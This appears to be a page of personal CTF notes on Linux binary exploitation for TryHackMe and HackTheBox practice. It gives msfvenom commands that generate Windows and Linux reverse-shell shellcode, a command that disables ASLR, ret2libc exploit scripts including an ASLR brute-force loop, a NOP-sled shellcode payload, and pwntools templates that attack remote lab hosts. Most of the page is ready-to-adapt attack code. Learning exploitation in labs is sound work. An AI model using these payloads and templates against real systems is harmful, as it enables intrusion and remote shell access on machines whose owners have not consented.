TryhackmeHackthebox

Linux

Very Basic

# -----------| General Purpose Registers (32bit)
EAX        # Arithmetic and Logical Instructions
EBX        # Base Pointer for Memory Addresses
ECX        # Loop, Shift, Rotation Counter
EDX        # I/O Port Addressing, Multiplication, Division
ESI        # Pointer of data and source in string copy operations  (Source Index)  
EDI        # Pointer of data and destination in string copy operations  (Destination Index)

# -----------| Stack (32bit)
ESP        # The Stack Pointer (Store pointers)
EBP        # The Base Pointer
EIP        # The Instruction Pointer (Will tell what execute next!!)

  • Create shell code

# -----------| Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c 
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"    

# -----------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -b "\x00"

00. Basic Checks

# -----------| CPU architecture information 
lscpu 

# -----------| I4-64 System Calls
cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h

# -----------| checksec info
checksec <FileName>
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled            <-- we can't drop shell code and jump to it; so use return to lib.c        
    PIE:      No PIE (0x8048000)

# -----------| Disable ASLR (Address Space Layout Randomization)
echo 0 > /proc/sys/kernel/randomize_va_space

# -----------| Create pattern 
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

# -----------| Check offset value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_VALUE>

  • Get all functions

readelf -s BasicOne | grep FUNC

01. ret2libc (NX enabled)

# -----------| Check ASLR changing ?
for i in {1..20}; do ldd <FileName> | grep libc; done

  • Return to libc** [ ASLR OFF ]**

import struct

# pwndbg + create cyclic + find offset 
junk = "A"*52

# ldd <FileName>| grep libc <-- find the libc 
libc = 0xb7e19000

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x0003ada0)

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matters    
exit = struct.pack('<I',libc + 0x000b07c8)

# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x0015ba0b)

payload = junk + system + exit + binsh
print payload

  • Return to libc [ ASLR ON (Bruteforce) ]

from subprocess import call
import struct

# pwndbg + create cyclic + find offset 
junk = "A"*112

# ldd <FileName>| grep libc <-- find the libc 
libc = 0xb75b8000

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x00040310)

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- It does not really matters    
exit = struct.pack('<I',libc + 0x00033290)

# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh =struct.pack('<I',libc + 0x00162bac)

buff = junk
buff += system
buff += exit
buff += binsh

for i in range(513):
   print "Trying: %s" %i
   ret = call(["/programe/file/path", buff])

02. NOP sled (NX disabled)

## ------------------| x86 Bit
BUF_SIZE = 362

SHELL_CODE  = "\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += "\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += "\xcd\x80\x31\xc0\x40\xcd\x80"
EIP = "?" ## 0xbffff4c0 --> \xc0\xf4\xff\xbf

NOP_SLED = "\x90"*(BUF_SIZE-len(SHELL_CODE))

payload = NOP_SLED + SHELL_CODE + EIP
print payload

03. PWNtool Skeletons

  • ret2libc (32 bit)

#!/usr/bin/python3
from pwn import *

context(terminal=['tmux','new-window'])
#context(os='linux', arch='i386')

# If programe in local mode
#programe = gdb.debug('./myapp','b main')

# IF programe to remote mode
programe = remote('10.10.10.61',32812)

junk = ("A" * 212).encode()

# run gdb one then CTRL+C to brackground then type p system
system = p32(0xf7e4c060)

# type p exit on gdb
exit = p32(0xf7e3faf0)
 
# type find &system,+9999999,"sh" on gdb
# select one and then type x/s 0xf7f6ddd5 
binsh = p32(0xf7e3faf0)

#programe.recvuntil('What do you want me to echo back?')
programe.recvuntil('Enter Bridge Access Code:')
programe.sendline("Something")
programe.sendline(junk + system + exit + binsh)

programe.interactive()
from pwn import *

#context(terminal=['tmux','new-window'])
context(os='linux', arch='amd64')

# Load programe in local mode
programe = gdb.debug('./myapp','b main')

# Load programe to remote mode
programe = remote('10.10.10.147',1337)

junk = ("A" * 112).encode()
bin_sh = "/bin/sh\x00".encode()
system = p64(0x40116e)
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152)

#programe.recvuntil('What do you want me to echo back?')
programe.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
programe.interactive()

04. GDB

  • GDB-def

# -----------| load programe
gdb-gef ./myapp

# -----------| Run programe
run
r

# -----------| Create pattern
pattern create 200

# -----------| Search RSP or EIP
pattern search $rsp
pattern search $eip
pattern search qaaa
pattern search 0x00007fffffffe288

# -----------| Show registers
registers

  • GDB-Peda

# -----------| load programe
gdb-peda ./myapp

# -----------| Run programe
run
r

# -----------| Get memory address on system (!! run programe before get this)
p system

# -----------| Get memory address on bin/sh; get the value on libc : (!! run programe before get this)
searchmem /bin/sh

# -----------| Get memory address on exit
p exit

05. OBJDump

objdump -D myapp | grep system
PreviousBinary ExploitationNextWindows

Last updated